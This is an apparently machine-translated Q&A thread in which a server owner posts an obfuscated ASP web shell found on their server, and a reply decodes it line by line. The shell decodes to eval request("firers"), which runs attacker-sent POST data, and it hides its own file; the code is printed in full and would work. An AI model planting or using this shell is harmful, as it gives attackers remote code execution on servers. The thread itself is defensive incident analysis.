VB恶意软件工具反向工程

Question

我发现我的服务器，它做了一些不好的事情上有趣的恶意软件。 现在我试图对其进行逆向工程，但由于完全缺乏VB \ ASP的知识，我需要向您的同事求助。

<% 
Function MorfiCoder(Code) 
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) 
End Function 

Execute MorfiCoder(")/*/srerif/*/(tseuqer lave") 
Set fso=CreateObject("Scripting.FileSystemObject") 
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) 
if f.attributes <> 39 then 
f.attributes = 39 
end if 
%> 

据我了解 - 它执行一些命令并创建文件的某个地方与system \ hidden属性。 主要问题是 - 如何使用它，即从我看到的日志中，黑客上传这个文件并使用POST命令。我也希望这个命令能够理解，他如何能够将文件上传到某些文件夹，他应该能够这样做。

的任何建议都欢迎。卷曲POST样本将是惊人的。

Answer 1

无不需要在VB中的知识来研究这些代码做了什么;只需阅读文档。

MorfiCoder(")/*/srerif/*/(tseuqer lave")返回eval request("firers")（我假设像Replace或StrReverse功能是显而易见的）。

执行和eval是不言自明;为request的文档是here：

Request对象检索客户端浏览器的HTTP请求中传递给服务器的值。

因此，无论是串在firers请求变量，它会被执行（你说你已经知道你的攻击者使用一个简单的POST发送数据给他的剧本）。

Set fso=CreateObject("Scripting.FileSystemObject")创建FileSystemObject Object。

Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))creates a File Object;使用PATH_TRANSLATED中的路径。

那么一些attributes（Archive，System，Hidden，ReadOnly）是文件对象上设置（隐藏这个脚本）。

为什么你的攻击者能够到这个文件明明上传到你的服务器无法通过您所提供的信息来回答，并且也将是出了这个问题的范围和可能题外话到计算器。